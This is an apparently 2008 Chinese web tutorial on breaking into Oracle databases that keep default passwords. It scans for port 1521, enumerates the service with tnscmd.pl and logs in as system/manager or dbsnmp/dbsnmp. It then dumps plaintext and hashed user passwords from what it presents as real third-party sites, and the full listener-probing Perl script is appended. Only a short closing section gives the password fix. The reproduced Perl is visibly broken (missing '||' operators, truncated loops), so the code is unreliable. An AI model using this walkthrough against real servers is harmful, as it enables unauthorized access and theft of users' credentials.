分享
 
 
 

Oracle数据库中所存在默认密码的威胁

王朝oracle·作者佚名  2008-05-31
窄屏简体版  字體: |||超大  

Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:

1:支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几百千兆,可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高的性能,Oracle天天可连续24小时工作,正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。

2:Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统,保护了用户的投资。美国标准化和技术研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相兼容。

3:实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全性。Oracle实施数据完整性,为可接受的数据指定标准。

4:支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,答应将处理分为数据库服务器和客户应用程序,所有共享的数据治理由数据库治理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。

具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运行,以致Oracle上所开发的应用可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统,所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE答应不同类型的计算机和操作系统通过网络可共享信息。

虽然Oracle数据库具有很高的安全性,但是假如我们在配置的时候不注重安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依靠软件来实现。

我们知道,在MSSQL中,安装完成后默认有个sa的登陆密码为空,假如不更改就会产生安全漏洞。那么oracle呢?也有的。为了安装和调试的方便,Oracle数据库中的两个具有DBA权限的用户Sys和System的缺省密码是manager。笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用这个缺省密码去找我们感爱好的东西。如何实现,看下面的文章吧。

进行测试前我们先来了解一些相关的知识,我们连接一个Oracle数据库的时候,需要知道它的service_name或者是Sid值,就象mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲oracle的TNS listener,它位于数据库Client和数据库Server之间,默认监听1521端口,这个监听端口是可以更改的。但是假如你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,假如你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务名,服务状态和数据库服务名,而且正确率很高。

理论方面的讲完了,假如还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有:ActivePerl,Oracle客户端,Superscan或者是其它扫描端口的软件, Tnscmd.pl。

我们先用Superscan扫描开放了端口1521的主机,假设其IP是xx.xx.110.110,这样目标已经有了。然后我们要做的就是用Tnscmd.pl来查询远程数据库的服务名了,Tnscmd.pl的用法如下:

C:\perl\bin>perl tnscmd.pl

usage: tnscmd.pl [command] -h hostname

where 'command' is something like ping, version, status, etc.

(default is ping)

[-p port] - alternate TCP port to use (default is 1521)

[--logfile logfile] - write raw packets to specified logfile

[--indent] - indent & outdent on parens

[--rawcmd command] - build your own CONNECT_DATA string

[--cmdsize bytes] - fake TNS command size (reveals packet leakage)

我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。。。。

然后我们就这样来:

C:\perl\bin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent

sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521

writing 91 bytes

reading

._.......6.........?. ..........

DESCRIPTION=

TMP=

VSNNUM=135286784

ERR=0

SERVICES_EXIST=1

.Q........

SERVICE=

SERVICE_NAME=ORCL

INSTANCE=

INSTANCE_NAME=ORCL

NUM=1

INSTANCE_CLASS=ORACLE

HANDLER=

HANDLER_DISPLAY=DEDICATED SERVER

STA=ready

HANDLER_INFO=LOCAL SERVER

HANDLER_MAXLOAD=0

HANDLER_LOAD=0

ESTABLISHED=447278

REFUSED=0

HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227

HANDLER_NAME=DEDICATED

ADDRESS=

PROTOCOL=beq

PROGRAM=/home/oracle/bin/oracle

ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'

ARGV0=oracleORCL

ARGS='

LOCAL=NO

'

.........@

从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过sqlplus工具来远程连上它了,用户名和密码我们用默认的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,这个默认用户和密码是随版本的不同而改变的哦~~~~。

如下:

C:\oracle\ora90\BIN>sqlplus /nolog

SQL*Plus: Release 9.0.1.0.1 - ProdUCtion on Thu May 23 11:36:59 2002

(c) Copyright 2001 Oracle Corporation.All rights reserved.

SQL>connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=xx.xx.110.110)(port=1521)))(connect_data=(SERVICE_NAME=ORCL)));

假如密码正确,那么就会提示connected,假如不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然假如对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。

成功连接后,这样来

SQL>select distinct owner from all_objects;

上面是查看数据库里面有多少用户,是不是觉得oracle数据库和mssql数据库很象?提交后出现以下信息:

CTXSYS

MDSYS

DEMO

PUBLIC

SYS

SYSTEM

ORCL

...

我们需要的就是ORCL了,其他全是系统默认的,没有什么价值,呵呵~~~~

SQL>select owner,table_name from dba_tables where owner='ORCL';

上面是查看数据表的内容了,提交后,出现以下信息:

OWNERTABLE_NAME

------------------------------ ------------------------------

ORCL MLOG$_T1

ORCL PLAN_TABLE

ORCL VODAD

ORCL VODADMIN

ORCL VODBUSI

ORCL VODFIRM

ORCL VODFIRMDETAIL

ORCL VODGROUP

ORCL VODLOG

ORCL VODSUR

......

......

ORCL REGUNITTYPE

ORCL REGUSER

....

怎么样,发现你感爱好的没有呢?REGUSER?用户信息。。。。。。哈哈。然后提交如下语句:

SQL> desc ORCL.REGUSER;

NameNull?Type

----------------------------------------- -------- ----------------------------

UNAMEVARCHAR2(32)

PASSWord VARCHAR2(20)

IDTYPE VARCHAR2(2)

IDNUMVARCHAR2(20)

OCCUPATION VARCHAR2(2)

BIRTHDAY DATE

USTATE NUMBER(38)

.....

是不是眼前一亮?出现了用户名和密码的字眼哦,那好等什么呢?提交如下语句吧:

SQL> select UNAME,PASSWORD from ORCL.REGUSER;.....

UNAMEPASSWORD

---------------- --------------------

coolboy780929

Babycat546789

Mickey 794951

WING 357954

Badb0y 490570

abcd 161346

wwwcool940216

UNAMEPASSWORD

---------------- --------------------

killer 643059

lilymi 724811

mick 190553

Nicky277514

.....

得到什么了?用户名和密码,而且是明文的!这样我们就成功的得到了该数据库的敏感信息了,还想干什么呢?小心为妙,呵呵。

以上的密码是没有加密的,假如我们碰到那些安全意识比较高的治理员的话,那结果就不一样了,他会把默认密码更改掉,把敏感数据加密,比如我碰到的另一个主机就是这样的的情况了,密码不是明文显示的,而是进行了加密,这样就一定程度上增强了安全性。

SQL> select user_login_name,user_password from **.**;

USER_LOGIN_NAME USER_PASSWORD

-------------------- --------------------------------------------------

admin oc1VhCpFQ2Gfv5lLgqBlJ4nj

zsq fEqNCco3Yq9h5ZUglD3CZJT4

cyc fEqNCco3Yq9h5ZUglD3CZJT4

alanigp+2MewyV3chSc/kDsfXJX4

cindy Gb5DH4d0CCITzo09E7kJ8Ty5

alice fEqNCco3Yq9h5ZUglD3CZJT4

carriefEqNCco3Yq9h5ZUglD3CZJT4

wxm fEqNCco3Yq9h5ZUglD3CZJT4

zhangjfEqNCco3Yq9h5ZUglD3CZJT4

chengwl fEqNCco3Yq9h5ZUglD3CZJT4

peggy fEqNCco3Yq9h5ZUglD3CZJT4

那么密码加密了是否就没有办法了呢?当然不是的,即使是MD5加密的密码也是可以破解的嘛。假如密码破解不出来,我们至少也得到了用户的ID哈。。。。

就象mssql的sa弱口令可以得到系统权限一样,我们也可以利用这个得到主机的某些权限的,这里就不再讲了,当你明白了oracle的基本命令和操作指令后自然就知道了。

上面讲了这么多,那么如何来修改这个默认口令呢,这才是我们关心的问题。具体操作如下:

在SQL*DBA下键入:

alter user sys indentified by password;

alter user system indentified by password;

其中password为您为用户设置的密码。

其实就是这么简单的几个语句就可以把安全性提高很多。

总结:一句话,安全还是意识的问题,假如脑子里没有安全意识,那最安全的系统也是不安全的。

附件:Tnscmd.pl

#!/usr/bin/perl

#

# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp)

# tested under Linux x86 & OpenBSD Sparc + perl5

#

# Initial cruft: jwa@jammed.com5 Oct 2000

#

# $Id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa EXP $

#

# see also:

#http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.Html

#http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818

#http://otn.oracle.com/deploy/security/alerts.htm

#http://xforce.iss.net/alerts/advise66.PHP

#

# GPL'd, of course.http://www.gnu.org/copyleft/gpl.html

#

# $Log: tnscmd,v $

# Revision 1.32001/04/26 06:45:48jwa

# typo in url.whoops.

#

# Revision 1.22001/04/26 06:42:17jwa

# complete rewrite

#- use IO::Socket instead of tcp_open

#- got rid of pdump()

#- put packet into @list and build it with pack()

#- added --indent option

#

#

use IO::Socket;

use strict;# a grumpy perl interpreter is your friend

select(STDOUT);$=1;

#

# process arguments

#

my ($cmd) = $ARGV[0] if ($ARGV[0] !~ /^-/);

my ($arg);

while ($arg = shift @ARGV) {

$main::hostname = shift @ARGV if ($arg eq "-h");

$main::port = shift @ARGV if ($arg eq "-p");

$main::logfile = shift @ARGV if ($arg eq "--logfile");

$main::fakepacketsize = shift @ARGV if ($arg eq "--packetsize");

$main::fakecmdsize = shift @ARGV if ($arg eq "--cmdsize");

$main::indent = 1 if ($arg eq "--indent");

$main::rawcmd = shift @ARGV if ($arg eq "--rawcmd");

$main::rawout = shift @ARGV if ($arg eq "--rawout");

}

if ($main::hostname eq "") {

print <<_EOF_;

usage: $0 [command] -h hostname

where 'command' is something like ping, version, status, etc.

(default is ping)

[-p port] - alternate TCP port to use (default is 1521)

[--logfile logfile] - write raw packets to specified logfile

[--indent] - indent & outdent on parens

[--rawcmd command] - build your own CONNECT_DATA string

[--cmdsize bytes] - fake TNS command size (reveals packet leakage)

_EOF_

exit(0);

}

# with no commands, default to pinging port 1521

$cmd = "ping" if ($cmd eq "");

$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. DBAs are so whimsical

#

# main

#

my ($command);

if (defined($main::rawcmd))

{

$command = $main::rawcmd;

}

else

{

$command = "(CONNECT_DATA=(COMMAND=$cmd))";

}

my $response = tnscmd($command);

viewtns($response);

exit(0);

#

# build the packet, open the socket, send the packet, return the response

#

sub tnscmd

{

my ($command) = shift @_;

my ($packetlen, $cmdlen);

my ($clenH, $clenL, $plenH, $plenL);

my ($i);

print "sending $command to $main::hostname:$main::port\n";

if ($main::fakecmdsize ne "")

{

$cmdlen = $main::fakecmdsize;

print "Faking command length to $cmdlen bytes\n";

}

else

{

$cmdlen = length ($command);

}

$clenH = $cmdlen >> 8;

$clenL = $cmdlen & 0xff;

# calculate packet length

if (defined($main::fakepacketsize))

{

print "Faking packet length to $main::fakepacketsize bytes\n";

$packetlen = $main::fakepacketsize;

}

else

{

$packetlen = length($command) + 58; # "preamble" is 58 bytes

}

$plenH = $packetlen >> 8;

$plenL = $packetlen & 0xff;

$packetlen = length($command) + 58 if (defined($main::fakepacketsize));

# decimal offset

# 0: packetlen_high packetlen_low

# 26:cmdlen_high cmdlen_low

# 58:command

# the packet.

my (@packet) = (

$plenH, $plenL, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,

0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,

0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,

$clenH, $clenL, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,

0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00

);

for ($i=0;$i

{

push(@packet, ord(substr($command, $i, 1)));

}

my ($sendbuf) = pack("C*", @packet);

print "connect ";

my ($tns_sock) = IO::Socket::INET->new(

PeerAddr => $main::hostname,

PeerPort => $main::port,

Proto => 'tcp',

Type => SOCK_STREAM,

Timeout => 30) die "connect to $main::hostname failure: $!";

$tns_sock->autoflush(1);

print "\rwriting " . length($sendbuf) . " bytes\n";

if (defined($main::logfile))

{

open(SEND, ">$main::logfile.send") die "can't write $main::logfile.send: $!";

print SEND $sendbuf die "write to logfile failed: $!";

close(SEND);

}

my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf));

if ($count != length($sendbuf))

{

print "only wrote $count bytes?!";

exit 1;

}

print "reading\n";

# get fun data

# 1st 12 bytes have some meaning which so far eludes me

if (defined($main::logfile))

{

open(REC, ">$main::logfile.rec") die "can't write $main::logfile.rec: $!";

}

my ($buf, $recvbuf);

# read until socket EOF

while (sysread($tns_sock, $buf, 128))

{

print REC $buf if (defined($main::logfile));

$recvbuf .= $buf;

}

close (REC) if (defined($main::logfile));

close ($tns_sock);

return $recvbuf;

}

sub viewtns

{

my ($response) = shift @_;

# should have a hexdump option . . .

if ($main::raw)

{

print $response;

}

else

{

$response =~ tr/\200-\377/\000-\177/; # strip high bits

$response =~ tr/\000-\027/\./;

$response =~ tr/\177/\./;

if ($main::indent)

{

parenify($response);

}

else

{

print $response;

}

print "\n";

}

}

sub parenify

{

my ($buf) = shift @_;

my ($i, $c);

my ($indent, $o_indent);

for ($i=0;$i

{

$c = substr($buf, $i, 1);

$indent++ if ($c eq "(");

$indent-- if ($c eq ")");

if ($indent != $o_indent)

{

print "\n" unless(substr($buf, $i+1, 1) eq "(");

print "" x $indent;

$o_indent = $indent;

undef $c;

}

print $c;

}

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有